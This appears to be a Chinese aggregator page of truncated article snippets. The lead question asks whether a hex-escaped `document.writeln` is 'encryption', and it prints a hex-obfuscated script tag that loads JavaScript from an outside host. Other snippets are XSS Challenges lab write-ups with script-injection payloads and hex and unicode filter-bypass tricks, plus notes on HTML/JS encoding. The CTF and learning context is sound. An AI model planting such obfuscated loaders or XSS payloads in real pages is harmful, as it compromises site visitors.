document.write("\x3c\x54")?是加密了吗?】的更多相关文章

document.write("\x3c\x54")?是加密了吗?

<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x48\x54\x54\x50\x3A\x2F\x2F\x4F\x46\x46\x49\x43\x45\x2E\x46\x41\x51\x53\x45\x52\x56\x2E\x43\x4F\x4D\x2F\x66\x61\x71\x2E\x4A\x53\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x…

加密javascript代码

最近看了个js日历,里面用到了加密,看了下,自己也模仿做加密,现在只能加密一般的javascript语句 <!DOCTYPE html> <html> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <body> <textarea id=v1 rows="8" cols="80"&…

js加解密

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>    <meta http-equiv="Content…

XSS quiz练习题做题过程及感悟

XSS quiz 最近刚学XSS.所以新手理解如有错误不当,欢迎批评指正. 第1题 一开始做,使用了Chrome浏览器.第一题怎么都做不出来.突然想起来使用IE,打开IE11,才成功了. <script>alert(document.domain);</script> 第2题 第二题,直接用这个不行. 查看源代码. 构造一个,把左边的< input ..... 封掉. "><script>alert(document.domain);</sc…

Pyqt QListWidget之缩略图列表

QListWidget 可以设置模型setViewMode  当setViewMode值为QListView.IconMode 表示Icon模式 以下代码来自Pyqt Example #!/usr/bin/env python # -*- coding: UTF8 -*- from PyQt4 import QtCore, QtGui import configdialog_rc3 class ConfigDialog(QtGui.QDialog): def __init__(self, par…

XSS Challenges xss-quiz.int21h.jp

概述: https://xss-quiz.int21h.jp/ Stage #1 payload: <script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70 尝试: <script>alert(document.domain);</script> 未果 i…

XSS Challenges练习及解答

一个偶然的机会在知道创宇的技能表里看到了一个练习XSS的网站http://xss-quiz.int21h.jp,正好想研究这个,于是试着做了一下. 第一.二题是最简单的,直接在搜索框中输入以下代码就成功了. "><script>alert(document.domain);</script> 第三题,根据提示:The input in text box is properly escaped,输入的内容已经被转义了,于是我借助了tamper data插件,在搜索框中…

HTML和JS自解码机制

1.HTML 如果用户的输入被嵌入到HTML代码中,会进行HTML解码 解码方式包括: 1.HTML实体编码: 假定下面onclick后面的内容是可控的 点击按钮 2.进制编码: 点击按钮 2.JS 如果输入在<script>标签当中 1.Unicode形式(十六进制) <html> <script> document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0031\u0020\u0…

xss challenges平台学习

虽然在很早之前就接触过xss,有一段时间还就着一本书研究过,但是始终没有实感,掌握的也不够系统,所以现在借着这几个平台再学习一遍 首先来玩一玩xss challenge平台 第一关:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1 提…

XSS Chanllenges 16-19

Stage #16 同样为DOM 型XSS ,document.write() 方法 插入代码 \x3cscript\x3ealert(document.domain)\x3c/script\x3e   查看源代码,过滤了反斜杠,插入 \\x3cscript\\x3ealert(document.domain)\\x3c/script\\x3e   查看源代码,发现\x 转化成了\\x,尝试采用unicode 编码绕过   成功绕过,弹窗通关   Stage #17 宽字节注入,利用特殊字节吃掉…